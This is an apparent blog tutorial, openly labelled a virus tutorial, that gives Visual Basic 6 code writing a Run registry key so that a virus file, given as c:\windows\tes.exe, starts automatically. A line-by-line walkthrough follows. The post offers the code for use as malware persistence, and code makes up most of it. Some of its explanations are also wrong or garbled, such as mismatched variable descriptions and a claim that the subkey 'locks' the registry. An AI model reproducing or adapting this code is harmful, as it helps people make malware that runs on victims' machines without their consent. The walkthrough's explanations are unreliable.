Image default
Softorial

Virus Tutorial – INJECT THE REGISTRY WITH VISUAL BASIC

Registry? What is that? Read the article about Registry and then read this tutorial. The main is Registry contain files that use to regulate Windows System, the term is like a Computer Heart. To trigger the virus file automatically, we must do the command or key in:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

Or in:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\

How to do it? Follow this step :

  1. Make a project with one form and one button
  2. Copy the source code below appropriate, if that is a module source code, copy to the module. If The source code is in form, copy to the form.

‘//////////////////////////BEGINNING OF FORM CODE////////////////////////////////////////
Private Sub Command1_Click()
Dim newopen As Long
Dim secattr As SECURITY_ATTRIBUTES
Dim hKey, hkeyb As Long
Dim retval As Long
Dim nilai As String
Dim nl_angka As Long
Dim subkey As String

secattr.lpSecurityDescriptor = 0
secattr.bInheritHandle = True
secattr.nLength = Len(secattr)

nilai = “c:\windows\tes.exe”
nl_angka = 1
subkey = “Software\Microsoft\Windows\CurrentVersion\Run\”

retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey)
retval = RegSetValueEx(hKey, “teserror”, 0, REG_SZ, nilai, Len(nilai))
retval = RegCloseKey(hKey)
End Sub
‘///////////////////////END OF FORM CODE////////////////////////////////////

‘//////////////////////////////////BEGINNING OF MODULE CODE//////////////////////////////
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_DYN_DATA = &H80000006
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_PERFORMANCE_DATA = &H80000004
Public Const HKEY_USERS = &H80000003

Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H20006

Public Const REG_CREATED_NEW_KEY = &H1
Public Const REG_DWORD_BIG_ENDIAN = 5
Public Const REG_DWORD_LITTLE_ENDIAN = 4
Public Const REG_DWORD = 4
Public Const REG_EXPAND_SZ = 2
Public Const REG_LINK = 6
Public Const REG_MULTI_SZ = 7
Public Const REG_NONE = 0
Public Const REG_RESOURCE_LIST = 8
Public Const REG_SZ = 1
Public Const REG_BINARY = 3

Public Declare Function RegOpenKeyEx Lib “advapi32.dll” Alias _
“RegOpenKeyExA” (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long
Public Declare Function RegCreateKeyEx Lib “advapi32.dll” Alias _
“RegCreateKeyExA” (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions _
As Long, ByVal samDesired As Long, lpSecurityAttributes As SECURITY_ATTRIBUTES, _
phkResult As Long, lpdwDisposition As Long) As Long
Public Declare Function RegSetValue Lib “advapi32.dll” Alias _
“RegSetValueA” (ByVal hKey As Long, ByVal lpSubKey As String, ByVal _
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As String, ByVal cbData As Long) As Long

‘//////////////////////////////////END OF MODULE CODE/////////////////////////////

On this sub-chapter I will explain a little bit about coding in Windows Registry. Maybe I don’t peel to finish, but at least you can understand it.

Private Sub Command1_Click()
– The beginning of sub.

Dim newopen As Long
– Define the Newopen Variable with LongInteger kind.

Dim secattr As SECURITY_ATTRIBUTES
– Define the ecattr variable with kind of SECURITY_ATTRIBUTES, this variable type defined in source code module.

Dim hKey, hkeyb As Long
– Define the hKey  and  hkeyb variable with  Long Integer kind.

Dim retval As Long
– Define the retval variable with Long Integer kind.

Dim nilai As String
– Define the value variable with string string kind.

Dim subkey As String
– Define the retval variable with Long Integer kind.

secattr.lpSecurityDescriptor = 0
– Give value to secattr.lpSecurityDescriptor with 0, it useful to change the registry.

secattr.bInheritHandle = True
– Give value to secattr.bInheritHandel with True value berguna so that handle registry can be change and regenerated by the registry on another system.

secattr.nLength = Len(secattr)
– Give value to secattr.nLength with total value from that registry.

nilai = “c:\windows\tes.exe”
– Give variable value with “c:\windows\tes.exe” , useful to  call the virus file, can be loaded appropriate with location and name of the virus that you want to run.

subkey = “Software\Microsoft\Windows\CurrentVersion\Run\”
– Give subkey variable value with “Software\Microsoft\Windows\CurrentVersion\Run\” , useful to lock the registry that you want to lock.

retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey)
– Give retval value with RegOpenKeyEx function (HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey) , useful to open the registry key that you want to give the value.

retval = RegSetValueEx(hKey, “teserror”, 0, REG_SZ, nilai, Len(nilai))
– Give retval value with RegSetValueEx function (hKey, “teserror”, 0, REG_SZ, nilai, Len(nilai)) , useful to give registry key value that is “teserror”.

retval = RegCloseKey(hKey)
– Close the registry key.

End Sub
– The end of the sub.

Manner to run:

  1. Compile the source code using Visual Basic.
  2. Run and see the registry address. Is it appearing?
  3. If error, just read the next tutorial. Than you.

Related posts

Virus Tutorial – The Most Evil Virus From That Ever Exist

adminviro

Virus Tutorial – Kick Sothink (Flash Ship-Breaker) Using VB

adminviro

Virus Tutorial – Search The Active IP Address

adminviro

Leave a Comment